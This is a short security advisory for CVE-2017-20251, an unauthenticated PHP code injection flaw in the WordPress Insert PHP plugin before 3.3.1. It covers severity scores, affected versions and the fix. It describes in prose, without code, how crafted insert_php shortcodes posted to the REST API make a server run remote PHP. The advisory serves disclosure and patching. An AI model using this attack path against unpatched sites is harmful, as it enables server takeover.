A critical flaw in the WordPress Insert PHP plugin lets unauthenticated attackers execute arbitrary PHP on the server through the WordPress REST API.
What Is It
CVE-2017-20251 is a PHP code injection vulnerability (CWE-94) in the WordPress Insert PHP plugin in versions before 3.3.1. The flaw allows unauthenticated attackers to execute arbitrary PHP code by injecting malicious shortcodes through the WordPress REST API. Attackers send POST requests to the wp-json/wp/v2/posts endpoint with crafted content containing insert_php shortcodes, causing the server to include and execute remote PHP files.
Why It Matters
The vulnerability carries a CVSS 3.1 base score of 9.8 (Critical) with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, and a CVSS 4.0 score of 9.3. It is exploitable over the network with low attack complexity, requires no privileges and no user interaction, and yields high impact to confidentiality, integrity, and availability. Because exploitation is unauthenticated and leads directly to remote code execution, a vulnerable host can be fully compromised. A public exploit is available on Exploit-DB, lowering the barrier to attack.
What's Vulnerable
WordPress sites running the Insert PHP plugin at any version before 3.3.1. The vulnerable code path is reachable through the WordPress REST API wp-json/wp/v2/posts endpoint, where insert_php shortcodes in submitted content are processed and executed. The CVE is tagged unsupported-when-assigned.
Patch Status
The vulnerability is resolved in Insert PHP version 3.3.1. Administrators of affected sites should update to 3.3.1 or later, or remove the plugin if it is no longer maintained or needed. The NVD record lists this CVE with a vulnerability status of "Deferred." No CISA KEV entry was supplied, so active exploitation is not confirmed via KEV.